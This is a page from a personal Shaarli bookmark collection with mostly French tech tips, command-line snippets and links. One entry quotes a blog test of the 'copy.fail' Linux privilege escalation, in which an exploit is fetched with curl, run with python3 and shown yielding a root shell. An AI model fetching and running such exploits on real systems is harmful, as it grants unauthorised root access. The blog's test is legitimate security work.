• 6TM
  • My links
  • Tags
  • pics
  • RSS
  • Login
Filter untagged links

Command Line / TUI for Signal Messaginghttps://sh.6tm.es/

  • Messaging
  • Tool
  • OPS
  • Cli
  • WIP
  • Messaging
  • Tool
  • OPS
  • Cli
  • WIP

SIGNAL-CLI

brew install signal-cli # install signal cmd
signal link # install signal cmd
signal-cli --help # signal basic cmd
signal-cli send --help # signal basic cmd
signal-cli listContacts # list contacts as signal basic cmd
signal-cli send -m "OK" +33601234567 # --note-to-self / send msg to contact with signal basic cmd
signal-cli receive # receive msg with signal cmd
  • explore other tools as signal src
    • https://github.com/mh-g/python-signal-cli # needs https://github.com/AsamK/signal-cli/wiki/DBus-service
    • https://github.com/camwebb/signal-cli-wrapper # need gawk-json

SIGNAL TUI

  • https://github.com/johnsideserf/siggy # signal tui as macos messaging tool
    brew trust --formula johnsideserf/siggy/siggy # macos install as signal tui
    brew install siggy # macos install as signal tui
Permalink
August 23, 2026 at 12:55:21 PM GMT+2
QRCode
archive.org

vim search and replace using current line as reference point - Stack Overflowhttps://stackoverflow.com/questions/18020381/vim-search-and-replace-using-current-line-as-reference-point

  • Vim
  • TIL
  • Tip
  • OPS
  • Vim
  • TIL
  • Tip
  • OPS

You can use . for the current position, and .+10 for 10 lines down:

:.,.+10s/foo/bar/g

Some other useful ranges:

% for the whole file. Example: :%s/foo/bar/g.
'<,'> for the lines of visually selected block. This might get you more than you want of the visual selection starts or ends in the middle of a line. The whole line is included.
'a,'b from mark a to mark b.
.,$ from the current line to the end of the file.
Permalink
August 23, 2026 at 11:42:08 AM GMT+2
QRCode
archive.org

tombonez/noTunes: A simple macOS application that will prevent iTunes or Apple Music from launching.https://github.com/tombonez/noTunes

  • MacOS
  • Config
  • Media
  • Tool
  • MacOS
  • Config
  • Media
  • Tool

  • brew install --cask notunes
  • System Preferences -> Users & Groups -> "Login Items" -> add noTunes
  • enable noTunes to prevent Apple Music from opening
Permalink
August 9, 2026 at 9:47:11 AM GMT+2
QRCode
archive.org

(9) FEU AUX PORTES DE BORDEAUX : CE QUE LES SCIENTIFIQUES SAVAIENT ET QU'ON N'A PAS ÉCOUTÉ - YouTubehttps://www.youtube.com/watch?v=xzZPMzL9KPY

  • Ecology
  • Local
  • Life
  • Ecology
  • Local
  • Life

Pour mieux comprendre ce qui arrive en Gironde et dans les Landes.

Permalink
August 3, 2026 at 11:59:55 PM GMT+2
QRCode
archive.org

software recommendation - How do I convert a PNG to SVG? - Ask Ubuntuhttps://askubuntu.com/questions/470495/how-do-i-convert-a-png-to-svg

  • TIL
  • Media
  • Cli
  • Tool
  • Tip
  • TIL
  • Media
  • Cli
  • Tool
  • Tip

autotrace -output-format svg inputfile | tee inputfile.svg

Permalink
June 15, 2026 at 6:47:18 PM GMT+2
QRCode
archive.org

France Just Built Europe's Largest 3D Printed Apartment Block,  Three Months Faster Than Expected - 3D Printing Industryhttps://3dprintingindustry.com/news/france-just-built-europes-largest-3d-printed-apartment-block-three-months-faster-than-expected-251795/

  • 3DPrint
  • News
  • 3DPrint
  • News

Le plus grand immeuble imprimé en 30 jours.

  • Abrege source
Permalink
June 14, 2026 at 8:11:02 PM GMT+2
QRCode
archive.org

F1 Car vs MotoGP Bike vs Rally Car: Ultimate Drag Race! - YouTubehttps://www.youtube.com/watch?v=ADs8tvU2xDc

  • Sport
  • Racing
  • best
  • Moto
  • Sport
  • Racing
  • best
  • Moto

Et la performance époustouflante du Ford SuperVan 4.2 qui finit devant la F1.

Permalink
June 4, 2026 at 10:33:55 PM GMT+2
QRCode
archive.org

GitHub - linuxmint/warpinator: Share files across the LAN · GitHub - Liens en vrac de sebsauvagehttps://sebsauvage.net/links/?L1xVZg

  • Send
  • File
  • Tool
  • Share
  • OPS
  • Send
  • File
  • Tool
  • Share
  • OPS

envoyer, avec un minimum d'effort, un fichier ou un bout de texte d'une machine à une autre sur le même réseau local. Ça marche sous Linux, Windows et Android.

Permalink
June 4, 2026 at 5:37:39 PM GMT+2
QRCode
archive.org

Google releases experimental ‘COSMO’ AI assistant app on Play Store : r/Androidhttps://www.reddit.com/r/Bard/comments/1t0xnmy/google_releases_experimental_cosmo_ai_assistant/

  • Android
  • App
  • Tip
  • Hack
  • Android
  • App
  • Tip
  • Hack

Can you upload it to APKMirror using ML Manager and share the APK splits using SAI?

Permalink
June 2, 2026 at 12:28:39 PM GMT+2
QRCode
archive.org

INSANE Violinist Had NYC Crowd BLOWN AWAY [Full Jam] - YouTubehttps://www.youtube.com/watch?v=XjtQ2aHeFPA

  • Music
  • Live
  • Music
  • Live

Un DJ en mode homme-orchestre dans les rues de NYC.
Un mélange délicieux!

Permalink
May 31, 2026 at 5:27:59 PM GMT+2
QRCode
archive.org

Garder Android ouverthttps://keepandroidopen.org/fr/

  • Politics
  • Politics

UNE PÉTITION À SIGNER EN URGENCE.

À partir de septembre 2026, une mise à jour silencieuse, imposée sans consentement par Google, bloquera toutes les applications Android dont le développeur ne s'est pas enregistré auprès de Google, n'a pas signé son contrat, n'a pas payé et n'a pas fourni de pièce d'identité officielle.

Permalink
May 30, 2026 at 8:43:02 AM GMT+2
QRCode
archive.org

bash - Awk replace string in line - Stack Overflowhttps://stackoverflow.com/questions/39275121/awk-replace-string-in-line

  • awk
  • TIL
  • tip
  • GNU/Linux
  • OPS
  • awk
  • TIL
  • tip
  • GNU/Linux
  • OPS

awk '{sub(/are hello/,"are are")sub(/you hello/,"you you")}1' file

/foo/bar/how /SOME_TEXT_HERE/hello
/foo/bar/are are/SOME_OTHER_TEXT
/foo/bar/you you

Permalink
May 26, 2026 at 7:54:50 PM GMT+2
QRCode
archive.org

Convert multiple jpg images to mp4 video with ffmpeg commandhttps://sh.6tm.es/shaare/4qW72w

  • TIL
  • GNU/Linux
  • Tip
  • Media
  • Cli
  • OPS
  • TIL
  • GNU/Linux
  • Tip
  • Media
  • Cli
  • OPS

  • input.txt
    file 'photo1.jpg'
    file 'photo2.jpg'
    file 'photo3.jpg'
  • with 3 seconds of duration
    ffmpeg -f concat -safe 0 -r 1 -i input.txt -c:v libx264 -r 30 -pix_fmt yuv420p output.mp4
Permalink
May 17, 2026 at 10:47:38 AM GMT+2
QRCode
archive.org

How the hell do i connect to my nas from my mac over nfs!? : r/synologyhttps://www.reddit.com/r/synology/comments/1tautsp/how_the_hell_do_i_connect_to_my_nas_from_my_mac/

  • MacOS
  • File
  • Network
  • Share
  • TIL
  • MacOS
  • File
  • Network
  • Share
  • TIL

  • usually
    diskutil unmount /Volumes/stuff; mount -o nfsvers=4 -t nfs 192.168.1.82:/volume1/stuff /Volumes/stuff
  • for Synology NAS
    sudo mount -o nfsvers=3,rw,sync -t nfs 192.168.1.82:/volume1/stuff /Volumes/stuff
Permalink
May 13, 2026 at 3:47:36 PM GMT+2
QRCode
archive.org

Install mediainfo plugin for Yazi on Macoshttps://sh.6tm.es/shaare/_84Ryg

  • MacOS
  • Media
  • Tool
  • Install
  • TIL
  • OPS
  • MacOS
  • Media
  • Tool
  • Install
  • TIL
  • OPS

brew install media-info # install mediainfo cli via Homebrew
ya pkg add boydaihungst/mediainfo # install mediainfo plugin for Yazi
# add mediainfo parameters in config
cat<<EOF>>~/.config/yazi/yazi.toml
[plugin]
  prepend_preloaders = [
    # Replace magick, image, video with mediainfo
    { mime = "{audio,video,image}/*", run = "mediainfo" },
    { mime = "application/subrip", run = "mediainfo" },
    # Adobe Illustrator, Adobe Photoshop is image/adobe.photoshop, already handled above
    { mime = "application/postscript", run = "mediainfo" },
  ]
  prepend_previewers = [
    # Replace magick, image, video with mediainfo
    { mime = "{audio,video,image}/*", run = "mediainfo"},
    { mime = "application/subrip", run = "mediainfo" },
    # Adobe Illustrator, Adobe Photoshop is image/adobe.photoshop, already handled above
    { mime = "application/postscript", run = "mediainfo" },
  ]
EOF
  • Source
Permalink
May 9, 2026 at 11:03:50 AM GMT+2
QRCode
archive.org

Des enfants se dessinent de fausses moustaches pour tromper la reconnaissance faciale des réseaux sociaux, et ça marche : un tiers des enfants britanniques contournent les vérifications d'âge en lignehttps://securite.developpez.com/actu/382854/Des-enfants-se-dessinent-de-fausses-moustaches-pour-tromper-la-reconnaissance-faciale-des-reseaux-sociaux-et-ca-marche-un-tiers-des-enfants-britanniques-contournent-les-verifications-d-age-en-ligne/

  • Hack
  • Politics
  • Hack
  • Politics

C'est just magnifique!

Permalink
May 5, 2026 at 10:44:23 PM GMT+2
QRCode
archive.org

[TIL] Print file content from a specific commit for Githttps://sh.6tm.es/shaare/Jqy8yg

  • Git
  • TIL
  • Tip
  • Git
  • TIL
  • Tip

git show 6fd6475:playbook.yml

Permalink
May 5, 2026 at 9:41:34 AM GMT+2
QRCode
archive.org

Create Ansibles remote_tmp from config file variable - Stack Overflowhttps://stackoverflow.com/questions/59860898/create-ansibles-remote-tmp-from-config-file-variable

  • Ansible
  • Fixit
  • Ansible
  • Fixit

allow_world_readable_tmpfiles: true in your vars.yml file

Permalink
May 4, 2026 at 11:05:59 PM GMT+2
QRCode
archive.org

Blog Stéphane Bortzmeyer: Test de copy.fail et d'un contournementhttps://www.bortzmeyer.org/copyfail.html

  • GNU/Linux
  • Secops
  • CVE
  • GNU/Linux
  • Secops
  • CVE

toto@s55486:~$ curl https://copy.fail/exp > copyfail
% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   731    0   731    0     0   3458      0 --:--:-- --:--:-- --:--:--  3448

toto@s55486:~$ more copyfail 
#!/usr/bin/env python3
…

On l'examine mais, de toute façon, il est peu compréhensible. On le fait tourner (et je me répète, ne faites pas ça sur une machine de production !!!) :

toto@s55486:~$ python3 copyfail
# id
uid=0(root) gid=1000(toto) groups=1000(toto),100(users)

toto@s55486:~$ su
# 

Et voilà, on est root.

Permalink
May 4, 2026 at 9:02:02 PM GMT+2
QRCode
archive.org

cryinkfly/Autodesk-Fusion-360-on-Linux: This is a project, where I give you a way to use Autodesk Fusion 360 on Linux! - Codeberg.orghttps://codeberg.org/cryinkfly/Autodesk-Fusion-360-on-Linux

  • 3DPrint
  • Fusion360
  • Install
  • GNU/Linux
  • 3DPrint
  • Fusion360
  • Install
  • GNU/Linux

curl -L https://codeberg.org/cryinkfly/Autodesk-Fusion-360-on-Linux/raw/branch/main/files/setup/autodesk_fusion_installer_x86-64.sh -o "autodesk_fusion_installer_x86-64.sh" && chmod +x autodesk_fusion_installer_x86-64.sh && ./autodesk_fusion_installer_x86-64.sh --install --default

Permalink
April 15, 2026 at 2:46:15 PM GMT+2
QRCode
archive.org
1 / 3
Links per page
  • 20
  • 50
  • 100
Shaarli 96 shaares · Shaarli · The personal, minimalist, super fast, database-free, bookmarking service by the Shaarli community · Documentation · Theme : Stack · Font : DINish
Fold Fold all Expand Expand all Are you sure you want to delete this link? Are you sure you want to delete this tag? The personal, minimalist, super-fast, database free, bookmarking service by the Shaarli community